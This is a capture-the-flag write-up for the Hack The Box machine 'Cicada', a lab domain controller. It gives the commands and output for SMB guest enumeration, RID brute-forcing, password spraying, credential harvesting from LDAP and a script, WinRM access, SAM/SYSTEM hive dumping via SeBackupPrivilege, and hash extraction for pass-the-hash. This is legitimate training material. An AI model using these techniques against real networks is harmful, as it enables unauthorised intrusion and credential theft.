HTB Cicada Writeup
Cicada is a Windows machine rated as easy. It’s a good box for a beginner to practice AD enumeration.
Initial Enumeration
We start off with a port scan so we know what we have to work with.
As we’re not worried about detection we can use Rustscan and increase the speed of Nmap.
1
2
3
TARGET=10.10.11.35
rustscan --addresses $TARGET -- -sC -sV -T4 -oA portscan
Rustscan returns quite a few open ports, and as we already know that it’s a Windows host, we can see that it’s likely an AD DC because we can recognize the standard ports of DNS (53), Kerberos (88), RPC (135), SMB (139 & 445), LDAP (389,636,3268,3269) as well as WinRM (5985).
When we get the results from nmap we can see that this is indeed the case, with the domain being cicada.htb, and that the hostname is CICADA-DC.cicada.htb, which we can add to /etc/hosts.
SMB is a good place to start, so we begin with checking if we can get a Null/Guest session.
First off, we’ll list the shares.
1
2
3
4
5
6
7
8
9
10
11
smbclient -L $TARGET
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
There are two interesting shares, DEV and HR.
We’re unable to read the DEV share, but when connecting to the HR using anonymous auth, we find a file we can download and read.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
smbclient -U '' --password '' //$TARGET/HR
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024
4168447 blocks of size 4096. 404417 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
<ctrl+d>
cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: <redacted>
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Now we have a default password!
Getting a foothold
We could also achieve the same thing using guest authentication, and now this comes into play. Although we have a default password, we need find a user that hasn’t changed password.
Usernames can be enumerated using NetExec smb –rid-brute, which on this box can be done using a guest session, but not a null session.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nxc smb $TARGET -u '' -p '' --rid-brute
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\:
SMB 10.10.11.35 445 CICADA-DC [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
nxc smb $TARGET -u 'Guest' -p '' --rid-brute
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
<snip>
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
To get a list of users we can save the output to a temporary file and clean it up using awk and grep:
cat tmp.txt | grep -i euser | awk '{print $6}' | awk -F\\ '{print $2}' > users.txt
Now that we have a list of users we can do a password spray attack with the default password.
1
2
3
PASS='<redacted>'
nxc smb $TARGET -u users3.txt -p $PASS --continue-on-success
We find that the domain user michael.wrightson still has the default password, which gives us a valid set of credentials to work with. When checking SMB, however, we find that we can’t access any other shares.
We’re unable use the credentials to connect using WinRM, but perhaps we can authenticate with LDAP.
1
2
3
nxc ldap cicada.htb -u $USER -p $PASS
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:<redacted>
Success! We can now enumerate domain objects.
To get all the objects we can run the following command:
1
2
ldapsearch -H ldap://$TARGET -b "dc=cicada,dc=htb" -D $USER@cicada.htb -w $PASS "(objectClass=*)" > ldap.txt
This gives quite a lot of output though (5911 lines of text), but it doesn’t hurt to have it saved if we might need it later. We can also do a search for users by using objectClass=person and save to a file for only the user objects.
Now that we have pulled some domain info we can see if there’s anything stored in the user descriptions using grep:
1
cat ldap.txt | grep -i desc
In one of the descriptions we can read Just in case I forget my password is <redacted>.
We could do another password spray to get the username, but why poke at the target more than necessary? Even though being discovered isn’t a factor, the information is already saved, so we can just grep for the phrase using the flag -A to display lines below the match.
1
grep 'my passw' -A 23 ldap.txt
Now we can see that the user is david.orelious.
Yet again we go back to SMB and NetExec, and we find that our new user can access the DEV share.
Inside the share we find a script called Backup_script.ps1, which contains yet another set of credentials.
Using our third set of credentials we can finally connect to the host using WinRM.
1
evil-winrm -i $TARGET -u $USER -p $PASS
Now we can collect the user flag.
Privilege Escalation
A good place to start is to check the users privileges.
1
2
3
4
5
6
7
8
9
10
11
12
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Here we see that the user has SetBackupPrivilege set, which means that the user can read all files, and thus we can dump registry hives to get NTLM hashes for cracking or pass-the-hash attacks.
1
2
3
4
5
mkdir C:\temp
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
download C:\temp\sam
download C:\temp\system
After removing the files from the server and disconnecting, we can now use pypykatz to extract hashes:
1
pypykatz registry --sam sam system
With the Administrators hash to connect using WinRM and collect the root flag from the admin desktop.
Comments powered by Disqus.